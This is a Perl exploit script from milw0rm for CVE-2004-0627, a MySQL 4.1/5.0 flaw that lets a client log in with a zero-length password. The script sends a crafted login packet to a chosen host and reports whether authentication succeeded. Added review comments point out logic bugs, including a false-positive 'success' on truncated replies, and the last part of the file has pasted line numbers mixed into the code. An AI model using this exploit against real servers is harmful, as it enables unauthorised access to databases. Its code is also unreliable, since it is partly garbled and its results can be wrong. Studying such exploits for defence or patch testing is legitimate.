MySQL 4.1/5.0 - Zero-Length Password Authentication Bypass - CVE-2004-0627

#!/usr/bin/perl
#
# The script connects to MySQL and attempts to log in using a zero-length password
# Based on the vuln found by NGSSecurity
#
# The following Perl script can be used to test your version of MySQL. It will display
# the login packet sent to the server and its reply.
#
# Exploit copyright (c) 2004 by Eli Kara, Beyond Security
# elik beyondsecurity com
#
# NOTE(review): `use warnings` is not enabled, so the undefined-value cases
# flagged in the comments below run silently instead of warning.
use strict;
use IO::Socket::INET;

# NOTE(review): this condition is always true (any count is >= 1 or <= 3), so
# usage() is never reached from here; the $host check further down is what
# actually catches a missing argument.
usage() unless ((@ARGV >= 1) || (@ARGV <= 3));

# Positional arguments: <username> <host> [port].
my $username = shift(@ARGV);
my $host = shift(@ARGV);
if (!$host)
{
  usage();
}
my $port = shift(@ARGV);
if (!$port)
{
 $port = 3306; print "Using default MySQL port (3306)\n";
}

# create the socket
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

# receive greeting
# recv()'s return value (undef on error) is not checked; after a failed read
# $reply is still undefined and the length test below reports it as a refusal.
my $reply;
recv($socket, $reply, 1024, 0);
# Anything shorter than 7 bytes is treated as the server refusing the
# connection. The greeting is only hex-dumped, never parsed.
if (length($reply) < 7)
{
 print "Not allowed to connect to MySQL!\n";
 exit(1);
}
print "Received greeting:\n";
HexDump($reply);
print "\n";

# here we define the login OK reply
# my $login_ok = "\x01\x00\x00\x02\xFE";

# break the username string into chars and rebuild it
# (pack of unpack "C*" yields the same bytes, so this is effectively a copy)
my $binuser = pack("C*", unpack("C*", $username));

# send login caps packet with password
my $packet = "\x85\xa6".
             "\x03\x00\x00".
    "\x00".
    "\x00\x01\x08\x00\x00\x00". # capabilities, max packet, etc..
             "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
             "\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\x00". # username and pword hash length + NULL hash
             "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; # continue NULL hash

# NOTE(review): pack("C1", ...) keeps only the low byte of the length and the
# next two length bytes are hard-coded to zero, so this header is only correct
# for packets under 256 bytes (i.e. a short $username).
substr($packet, 0, 0) = pack("C1", length($packet)) . "\x00\x00\x01"; # MySQL message length + packet number (1)

print "Sending caps packet:\n";
HexDump($packet);
print "\n";
send $socket, $packet, 0; # return value (bytes sent, or undef on error) is not checked

# receive reply
recv($socket, $reply, 1024, 0);
print "Received reply:\n";
HexDump($reply);

my @list_bytes = unpack("C*", $reply);

#print "The fifth byte is: ", $list_bytes[4], "\n";
# NOTE(review): length() forces @list_bytes into scalar context, so this
# measures the number of digits in the element count (>= 4 only for a reply of
# 1000+ bytes), not the count itself. A reply shorter than 5 bytes is therefore
# NOT caught here; it reaches the $list_bytes[4] test below with an undefined
# value, which compares == 0 and is reported as a successful authentication
# (a false positive, e.g. on an empty or truncated read).
if (length(@list_bytes) >= 4)
{
 print "Response insufficent\n";
}

#if ($reply eq $login_ok)
# Byte 4 is the first payload byte after the 4-byte packet header (3 length
# bytes + packet number, see the substr() above). 0x00 and 0xFE are both
# accepted as an OK reply (cf. the commented-out $login_ok above, whose fifth
# byte is 0xFE); any other value is reported as a failure.
if ($list_bytes[4] == 0 || $list_bytes[4] == 254)
{
 print "Received OK reply, authentication successful!!\n";
}
else
{
 print "Authentication failed!\n";
}

# close
close($socket);
  92.  
  93.  
  94. sub usage
  95. {
  96.     # print usage information
  97.     print "\nUsage: mysql_auth_bypass_zeropass.pl <username> <host> [port]\n
  98. <username> - The DB username to authenticate as
  99. <host> - The host to connect to
  100. [port] - The TCP port which MySQL is listening on (optional, default is 3306)\n\n";
  101.     exit(1);
  102. }
  103.  
  104.  
  105. ###
  106. # do a hexdump of a string (assuming it's binary)
  107. ###
  108. sub HexDump
  109. {
  110.  my $buffer = $_[0];
  111.  
  112.  # unpack it into chars
  113.  my @up = unpack("C*", $buffer);
  114.  my $pos=0;
  115.  
  116.  # calculate matrix sizes
  117.  my $rows = int(@up/16);
  118.  my $leftover = int(@up%16);
  119.  
  120.  for( my $row=0; $row < $rows ; $row++, $pos+=16)
  121.  {
  122.   printf("%08X\t", $pos);
  123.   my @values = @up[$pos .. $pos+15];
  124.   my @line;
  125.   foreach my $val (@values)
  126.   {
  127.    push(@line, sprintf("%02X", $val));
  128.   }
  129.   print join(' ', @line), "\n";
  130.  }
  131.  # print last line
  132.  printf("%08X\t", $pos);
  133.  my @values = @up[$pos .. $pos+$leftover-1];
  134.  my @line;
  135.  foreach my $val (@values)
  136.  {
  137.   push(@line, sprintf("%02X", $val));
  138.  }
  139.  print join(' ', @line), "\n";
  140. }
  141.  
  142. # milw0rm.com [2004-07-10]
  143.            